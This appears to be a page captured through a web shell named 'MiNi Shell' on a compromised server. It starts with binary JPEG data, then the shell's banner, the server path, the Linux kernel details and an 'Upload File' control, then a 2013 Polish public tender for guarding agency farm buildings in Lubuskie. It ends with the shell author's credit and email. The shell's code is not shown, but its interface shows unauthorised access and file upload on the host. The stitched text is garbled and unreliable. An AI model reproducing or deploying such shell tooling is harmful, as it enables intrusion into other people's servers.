JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131206/264099-N-2013.html

<p class="kh_header"><b>Zielona Góra: Świadczenie usługi dozoru oraz ochrony mienia zasobu na obiektach zlokalizowanych w gminach: Gubin, Lubsko, Jasień, Żary, Trzebiel, Żagań, Iłowa,  Szprotawa</b><br>
<b>Numer ogłoszenia: 264099 - 2013; data zamieszczenia: 06.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Nieruchomości Rolnych Oddział Terenowy w Gorzowie Wlkp. Filia w Zielonej Górze , ul. Lwowska 25, 65-225 Zielona Góra, woj. lubuskie, tel. 068 3272389, faks 068 3272006.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.anr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi dozoru oraz ochrony mienia zasobu na obiektach zlokalizowanych w gminach: Gubin, Lubsko, Jasień, Żary, Trzebiel, Żagań, Iłowa,  Szprotawa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zakresem przedmiotu zamówienia jest ochrona i dozór bezpośredni budynków pomieszczeń użytkowych i mienia znajdującego się w budynkach przed niepożądanym działaniem osób trzecich oraz ochrona w sytuacjach szczególnego zagrożenia. Do obowiązków pracowników służby ochronnej należy zabezpieczenia mienia Zamawiającego, znajdującego się na terenie nieruchomości objętej ochroną, przed kradzieżą, włamaniem i uszkodzeniem oraz zapobieganie pożarom, zalaniom pomieszczeń itp. wypadkom losowym, w przypadku możliwości zaobserwowania i stwierdzenia tych zjawisk. Ochronie podlegają następujące obiekty:

Gmina Gubin - Obiekty są nie użytkowane, nie ogrodzone.

Lp	Miejscowość/ nazwa obiektu	Działka 	Nr inw.	Nazwa środka trwałego	Godz. pracy
1.	Luboszyce	14/25	LU-5/20	Pałac	
Dozór, ochrona doraźna
12 godz./dobę
		14/25	LU-34/20,73/20,747/20 40/20, 	Kompleks Gorzelnia	
		14/25	LU-35/20	Warsztat	
		14/25	LU-1027/20,LU-54/20	Szopa i wiata	
		14/25	LU-85/20	Obora	
		14/25	LU-43/20	Magazyn	
		14/25	LU-38/20	Magazyn	
		14/25	LU-80/20	Chlewnia	
		13	LU-1013/20,LU-60/20	Garaże	
Gmina Lubsko - Obiekty są nie użytkowane, nie ogrodzone.

Lp	Miejscowość/ nazwa obiektu	Działka 	Nr inw.	Nazwa środka trwałego	Godz. pracy
2.	Dłużek	422	LU-6/1/2	Pałac	
Dozór, ochrona doraźna
12 godz./dobę
Do dyspozycji pomieszczenie dla dozoru
		422	LU-15/28/2	Gołębnik	
		422	LU-20/6/2	Stajnia - mag	
		422	LU-19/7/2	Obora - bukaciarnia	
		422	LU-17/16/2	Bud. gosp.	
		422	LU-12/9/2	Stodoła 	
		422	LU-268/2,LU-275/2	Chłodnia - sortownia	
		422	LU-276/116/2	Warsztat 	
		423/1	LU-11/10/2	Stodoła	
		423/1	LU-18/12/2	Obora bukaciarnia	
		422	LU-22/14/2	Magazyn nawozów	
		422	LU-15/28/2	Bud. gosp.	
		422	LU-16/11/2	Bud. gosp.	


Gmina Jasień - Obiekty są nie użytkowane - ogrodzone.
Lp	Miejscowość/ nazwa obiektu	Działka 	Nr inw.	Nazwa środka trwałego	Godz. pracy
3.	Mirkowice	292/26	LU-12/7	Jałownik	Dozór, ochrona doraźna 
16 godz./dobę

Do dyspozycji pomieszczenie dla dozoru.

Teren gospodarstwa ogrodzony
		292/26	LU-13/7	Jałownik	
		292/26	LU-14/7	Obora	
		292/26	LU-15/7	Obora	
		292/26	LU-4/7	Paszarnia	
		292/26	LU-9/7	Wiata	
		54/12	LU-5/7,LU-300/7	Warsztat + biura	
		54/12	LU-304/7	Magazyn paliw	
		54/12	LU-11/7	Jałownik	
		54/12	LU-289/7	Wiata - garaże	


Gmina Żary - Obiekty są nie użytkowane, nie ogrodzone.

Lp	Miejscowość/ nazwa obiektu	Działka 	Nr inw.	Nazwa środka trwałego	Godz. pracy
4.	Olszyniec	7/13	LUG-163/18	Bud. adm. maga.	
Patrole doraźne 
2 godz/dobę 
		7/13	LUG-142/18	Bukaciarnia	
		7/13	LUG-124/18	Bukaciarnia	
		7/13	LUG-125/18	Bukaciarnia	

Gmina  Trzebiel - Obiekty są nie użytkowane, częściowo ogrodzone.

Lp	Miejscowość/ nazwa obiektu	Działka 	Nr inw.	Nazwa środka trwałego	Godz. pracy
5.	Dębinka	8/8	LUG-13/8	Pałac	

Dozór 24 godz/dobę
Do dyspozycji pomieszczenie dla dozoru

		8/9	LUG-33/8	Warsztat	
		8/9	LUG-12/8	Bud. adm. mieszkalny.	
		8/9	LUG-32/8	Magazyn	
		8/9	LUG-19/8	Stodoła	
		8/9	LUG-31/8	Garaże	
		8/9	LUG-497/8	Wiata	
		8/9	LUG-492/8	Bud. socjal.	
		8/9	LUG-189/8	Obora	
		8/9	LUG-34/8	Magazyn	
		8/9	LUG-496/8	Stacja paliw	
		8/9	LUG-494/8	Bud. hydroforni 	
		12/5	LUG-490/8	Jałownik	
		12/5	LUG-483/8	Chlewnia	
		12/5	LUG-488/8	Paszarnia	
		12/5	LUG-479/8	Hydrofornia	


Gmina Żagań - Obiekty są nie użytkowane, nie ogrodzone 

Lp	Miejscowość/ nazwa obiektu	Działka 	Nr inw.	Nazwa środka trwałego	Godz. pracy
6.	Stary Żagań	1/10	LUG-38/24	Stodoła	
Patrol doraźny
2godz./dobę
		1/3	LUG-47/24	Cielętnik	
		1/10	LUG-48/24	Chlewnia	
7.	Żagań -Bożnów	151/12	LUG-75/19	Bukaciarnia	
Patrol doraźny
2 godz./dobę
		151/12	LUG-73/19	Bukaciarnia	
		151/12	LUG-76/19	Bukaciarnia	
		151/12	LUG-78/19	Bukaciarnia	
		151/12	LUG-77/19	Bukaciarnia	
		151/12	LUG-82/19	Bud. socjal.	
		151/12	LUG-41/19	Bukaciarnia	
		151/12	LUG-131/19	Mag. posz	

Gmina Iłowa - Obiekty są nie użytkowane, częściowo  ogrodzone 

Lp	Miejscowość/ nazwa obiektu	Działka 	Nr inw.	Nazwa środka trwałego	Godz. pracy
8.	Konin Żagański	1/66	LUG-1/34	Kuźnia	Patrol doraźny
8 godz./dobę
		1/66	LUG-2/34	Garaż na ciągniki 	
		1/66	153-501	Budynek maga.	
		1/66	LUG-3/34	Magazyn zbożowy	
		1/66	LUG-357/34	Chlewnia	
		1/66	LUG-38/34	Chlewnia	
		1/66	LUG-41/34	Chlewnia	
		1/66	LUG-41A/34	Biuro-chlewnia	
		1/66	LUG-4/34	Mag. Nawozów	
		1/66	LUG-528/34	Garaż na maszyny	
		1/66	LUG-61/34	Bud. gospodarczy	
		1/66	LUG-733/34	Paszarnia	
		1/49	LUG-195/34	Hydrofornia	


Gmina Szprotawa -Obiekty są nie użytkowane, nie ogrodzone.

Lp	Miejscowość/ nazwa obiektu	Działka 	Nr inw.	Nazwa środka trwałego	Godz. pracy
9.	Witków I	555/16
555/21
555/22
555/17
557/15
552/4	PO-2404/6	Owczarnia	
Dozór, ochrona doraźna 
8 godz./dobę


Brak pomieszczenia dla dozoru
			PO-2405/6	Budynek gosp.	
			PO-2409/6	Jałownik	
			PO-2410/6	Obora	
			PO-2411/6	Magazyn nawozów	
			PO-2412/6	Owczarnia	
			6/105	Budynek mieszkalny	
			PO-380/6	Budynek gosp.	
			PO-453/6	Budynek gosp.	


2.	Warunki  realizacji zamówienia:
2.1.	Służbę ochronną pełnia pracownicy zgodnie z grafikiem służby, opracowanym na każdy miesiąc.
2.2.	Pracownicy pełniący dyżur w czasie służby pracują pod kierownictwem dozorującego, zgodnie z przedmiotem zamówienia opisanym w SIWZ.
2.3.	W czasie służby pracownicy ochrony winni być wyposażeni w uniform służbowy, identyfikator osobisty pracownika ochrony, telefon, latarkę, gwizdek, i inne urządzenia potrzebne do pełnienia służby.
3.	Do obowiązków pracowników ochrony pełniących służbę  należy:
3.1.	Przestrzeganie dyscypliny czasu pracy.
3.2.	Dokładna znajomość chronionej nieruchomości oraz wszystkich pomieszczeń wewnętrznych, ze szczególnym uwzględnieniem:
a)	punktów najbardziej narażonych na ewentualne kradzieże lub włamania,
b)	rozmieszczenia i obsługi urządzeń oraz sprzętu ppoż., / jeżeli występuje /
c)	sposobów i terminów zamykania i zabezpieczenia terenu oraz budynków,
d)	sposobu powiadamiania wyspecjalizowanych służb miejskich o zaistniałych wypadkach nadzwyczajnych (włamanie, pożar, zalanie) oraz umiejętności zwalczania skutków tych zdarzeń,
e)	sposobów kontaktowania się z wyznaczonym przedstawicielem Zamawiającego oraz przedstawicielem Wykonawcy,
4.	Znajomość zasad oraz umiejętność udzielania pierwszej pomocy przedlekarskiej.
5.	W czasie pełnienia służby należy: bardzo dokładne skontrolować stan zabezpieczenia obiektu, przede wszystkim zamki, kłódki, plomby, kraty, elementy ogrodzenia, oświetlenia terenu, itp.,
6.	Pracownicy ochrony mają obowiązek zachować w tajemnicy wszelkie informacje dotyczące dozorowanej nieruchomości oraz inne informacje związane z działalnością Zamawiającego.
7.	W czasie pełnienia służby pracownika Wykonawcy powinna cechować właściwa postawa moralna, wszechstronna znajomość obowiązujących zarządzeń i instrukcji oraz przestrzeganie dyscypliny zawodowej i poczucie odpowiedzialności za właściwe wykonywanie powierzonych obowiązków. 
8.	W czasie służby zabrania się:
- spożywać napoje alkoholowe, pełnić służbę w stanie wskazującym na spożycie alkoholu, uprawiać gry hazardowe i zachowywać się rażąco w stosunku do obowiązujących zasad regulaminowych,
- zezwalać na przebywanie w budynkach Zamawiającego, jak i na terenie strzeżonego obiektu osobom postronnym i bez uprawnień,.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że Wykonawca posiada uprawnienia do wykonywania usług objętych zamówieniem Wykonawca zobowiązany jest załączyć do oferty:
- Koncesję określającą zakres i formę prowadzenia usług ochrony mienia i osób udzieloną przez Ministra właściwego do spraw wewnętrznych zgodnie z ustawą o ochronie osób i mienia,
- oświadczenie o spełnianiu warunków udziału postępowaniu zgodnie z art. 22 ust. 1 ustawy PZP</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że Wykonawca posiada wiedzę i doświadczenie Wykonawca zobowiązany jest załączyć do oferty:
- oświadczenie o spełnianiu warunków udziału postępowaniu zgodnie z art. 22 ust. 1 ustawy PZP,
- wykaz wykonanych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert. Wykonawca powinien wykazać co najmniej 1 usługę tożsamą z przedmiotem zamówienia.
- dokumenty potwierdzające, że usługi wymienione w wykazie zostały wykonane należycie,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że Wykonawca dysponuje  odpowiednim potencjałem technicznym zdolnym do wykonania zamówienia Wykonawca zobowiązany jest załączyć do oferty:
- oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy PZP,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia Wykonawca zobowiązany jest załączyć do oferty:
- oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy PZP,
- wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz 
z informacjami na temat ich kwalifikacji zawodowych, a także zakresu wykonywanych przez nich czynności oraz informacją o podstawie dysponowania tymi osobami wraz z oświadczeniem, że osoby te będą uczestniczyć w wykonywaniu zamówienia. Wymagane jest aby Wykonawca wskazała w ofercie co najmniej jedną osobę posiadającą licencję pracownika ochrony fizycznej pierwszego lub drugiego stopnia, która będzie kierowała pracą grupy pracowników ochrony (koordynator),
- oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia w zakresie ochrony.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Wykonawca zobowiązany jest załączyć do oferty:
- oświadczenie o spełnianiu warunków udziału postępowaniu zgodnie z art. 22 ust. 1 ustawy PZP,
- opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>OŚWIADCZENIE o spełnieniu warunku dotyczącego klauzuli społecznej.
Klauzule społeczne
Zamawiający ustanawia dodatkowe wymagania związane z realizacją zamówienia w formie klauzuli społecznej. Na podstawie art.29 ust.4 ustawy Prawo zamówień publicznych zamawiający wymaga, aby wśród osób uczestniczących w wykonywaniu zamówienia była jedna osoba bezrobotna na podstawie skierowania z powiatowego Urzędu Pracy, zgodnie z ustawą z dnia 20.04.2004r o promocji zatrudnienia i instytucjach rynku pracy (Dz.U. z 2008 nr 69, poz 415 z późn.zm.) lub na podstawie właściwego dokumentu kierującego bezrobotnego do pracodawcy, wystawionego przez organ zajmujący się realizacją zadań z zakresu rynku pracy, określony w analogicznych przepisach państwa członkowskiego UE lub Europejskiego Obszaru Gospodarczego. Wyżej wskazana osoba powinna być zatrudniona w terminie nie dłuższym niż 14 dni od daty podpisania umowy, nieprzerwanie przez cały okres trwania umowy. Wykonawca w przypadku uznania jego oferty za najkorzystniejszą, zobowiązany jest do zatrudnienia 1 osoby bezrobotnej zgodnie z wymaganiami wskazanymi w niniejszym punkcie - klauzula społeczna, oraz w terminie do 21 dni od daty podpisania umowy, przedłożenia zamawiającemu zgłoszeń ofert pracy, odpisu skierowania osoby bezrobotnej przez  powiatowy Urząd Pracy do pracodawcy oraz umowy o pracę. Zamawiający uprawniony będzie do kontroli spełnienia przez wykonawcę wymagań dotyczących zatrudnienia w/w osoby. Na żądanie zamawiającego wykonawca obowiązany będzie niezwłocznie udokumentować fakt zatrudnienia w/w osoby.
W przypadku nie zatrudnienia w sposób nieprzerwany przy realizacji zamówienia wymaganej przez zamawiającego liczby osób bezrobotnych, wykonawca zapłaci zamawiającemu karę umowną, w wysokości iloczynu kwoty najniższego wynagrodzenia, wraz z należnymi składkami na ubezpieczenie społeczne, oraz liczby miesięcy realizacji zamówienia, za każdego nie zatrudnionego bezrobotnego, poniżej liczby wymaganej przez zamawiającego, chyba że wykonawca wykaże, że przedstawił zgłoszenie ofert pracy
Powiatowemu Urzędowi Pracy, albo odpowiedniemu organowi zajmującemu się realizacją zadań z zakresu rynku pracy w państwie, w którym wykonawca ma siedzibę lub miejsce zamieszkania, a nie zatrudnienie osoby bezrobotnej nastąpiło z przyczyn nie leżących po jego stronie. Za przyczynę nie leżącą po stronie wykonawcy będzie uznany w szczególności brak osób bezrobotnych zdolnych do wykonywania zamówienia na obszarze, w którym jest realizowane zamówienie i w okresie jego realizacji.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej okoliczności wymienionej poniżej:

Zmiana terminu realizacji przedmiotu umowy:
1.	Zmiany spowodowane warunkami atmosferycznymi (np.: klęski żywiołowe, udokumentowane warunki atmosferyczne uniemożliwiające realizację przedmiotu umowy),
2.	Zmiany będące następstwem okoliczności leżących pod stronie Zamawiającego: wstrzymanie realizacji przedmiotu umowy przez Zamawiającego, w przypadku zbycia lub przejęcia przez inny podmiot administrowania obiektów, w przypadku protokolarnego przekazania nieruchomości nowemu nabywcy.
3.	Zmiany będące następstwem zdarzeń losowych, o których niezwłocznie poinformowano Zamawiającego.
Zmiana wynagrodzenia:
4.	Zmniejszenie zakresu przedmiotu zamówienia niezależnie od Wykonawcy służące celowemu wydatkowaniu środków publicznych. W takim przypadku przewidywane jest proporcjonalne zmniejszenie wynagrodzenia umownego w stosunku do określonego w ofercie.


Zmiany pozostałe:
5.	Odstąpienie od wykonania części przedmiotu zamówienia z powodu zbycia lub przejęcia przez inny podmiot administrowania obiektów.
6.	Zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana rachunku bankowego, umowy, zmiana adresu, zmiana administratora obiektów).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.anr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Lwowska 25, 65-225 Zielona Góra.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2013 godzina 09:00, miejsce: ul. Lwowska 25, 65-225 Zielona Góra, pokój nr 22 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com